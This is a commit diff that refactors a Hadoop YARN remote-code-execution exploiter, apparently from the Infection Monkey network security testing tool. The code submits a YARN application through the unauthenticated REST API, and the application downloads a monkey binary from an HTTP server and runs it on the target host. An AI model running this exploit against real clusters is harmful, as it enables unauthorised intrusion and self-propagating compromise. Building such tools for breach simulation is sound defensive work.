Refactored, notes fixed but file server still timeouts

2018-08-28 16:05:41 +03:00 · 2018-08-28 16:05:41 +03:00 · 568320c298
parent 02c27584da
commit 568320c298
1 changed files with 30 additions and 50 deletions
--- a/infection_monkey/exploit/hadoop.py
+++ b/infection_monkey/exploit/hadoop.py
@ -9,10 +9,9 @@ import random
 import string
 import logging
 from exploit.web_rce import WebRCE
-from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth, get_monkey_dest_path
+from tools import HTTPTools, build_monkey_commandline, get_monkey_depth
 import posixpath
-from threading import Lock
-from model import MONKEY_ARG
+from model import MONKEY_ARG, ID_STRING, DROPPER_ARG

 __author__ = 'VakarisZ'

@ -34,50 +33,27 @@ class HadoopExploiter(WebRCE):
                      "& %(monkey_path)s %(monkey_type)s %(parameters)s"
    # How long we have our http server open for downloads in seconds
    DOWNLOAD_TIMEOUT = 90
+    # Random string's length that's used for creating unique app name
+    RAN_STR_LEN = 6

    def __init__(self, host):
-        super(HadoopExploiter, self).__init__(host)
+        super(HadoopExploiter, self).__init__(host, {'linux': './monkey.sh',
+                                                     'win32': '%temp%\\monkey32.exe',
+                                                     'win64': '%temp%\\monkey64.exe'})

    def exploit_host(self):
        # Try to get exploitable url
-        exploitable_url = False
-        urls = self.build_potential_urls(self.host, self.HADOOP_PORTS)
-        for url in urls:
-            if self.try_exploit(url):
-                exploitable_url = url
-                break
-        if not exploitable_url:
-            LOG.info("No exploitable Hadoop server found")
+        urls = self.build_potential_urls(self.HADOOP_PORTS)
+        self.add_vulnerable_urls(urls, True)
+        if not self.vulnerable_urls:
            return False
-        src_path = get_target_monkey(self.host)
-        if not src_path:
-            LOG.info("Can't find suitable monkey executable for host %r", self.host)
+        paths = self.get_monkey_paths()
+        if not paths:
            return False
-        # Determine where to save monkey on the target
-        LOG.debug("Monkey path found")
-        path = get_monkey_dest_path(src_path)
-        if not path:
+        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path'])
+        command = self.build_command(paths['dest_path'], http_path)
+        if not self.exploit(self.vulnerable_urls[0], command):
            return False
-        # To avoid race conditions we pass a locked lock to http servers thread
-        lock = Lock()
-        lock.acquire()
-        # Create server for http download and wait for it's startup.
-        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path, lock)
-        lock.acquire()
-
-        # Build command to execute
-        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
-        if 'linux' in self.host.os['type']:
-            base_command = self.LINUX_COMMAND
-        else:
-            base_command = self.WINDOWS_COMMAND
-
-        command = base_command % {"monkey_path": path, "http_path": http_path,
-                                  "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
-
-        if not self.exploit(exploitable_url, command):
-            return False
-        lock.release()
        http_thread.join(self.DOWNLOAD_TIMEOUT)
        http_thread.stop()
        return True
@ -88,25 +64,29 @@ class HadoopExploiter(WebRCE):
        resp = json.loads(resp.content)
        app_id = resp['application-id']
        # Create a random name for our application in YARN
-        rand_name = "".join([random.choice(string.ascii_lowercase) for _ in xrange(6)])
+        rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in xrange(self.RAN_STR_LEN)])
        payload = self.build_payload(app_id, rand_name, command)
        resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
-        if resp.status_code == 202:
-            return True
-        else:
-            return False
+        return resp.status_code == 202

-    @staticmethod
-    def try_exploit(url):
-        # Get the newly created application id
+    def check_if_exploitable(self, url):
        try:
            resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
        except requests.ConnectionError:
            return False
-        if resp.status_code == 200:
-            return True
+        return resp.status_code == 200
+
+    def build_command(self, path, http_path):
+        default_path = self.get_default_dropper_path()
+        # Build command to execute
+        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path)
+        if 'linux' in self.host.os['type']:
+            base_command = self.LINUX_COMMAND
        else:
-            return False
+            base_command = self.WINDOWS_COMMAND
+
+        return base_command % {"monkey_path": path, "http_path": http_path,
+                               "monkey_type": DROPPER_ARG, "parameters": monkey_cmd}

    @staticmethod
    def build_payload(app_id, name, command):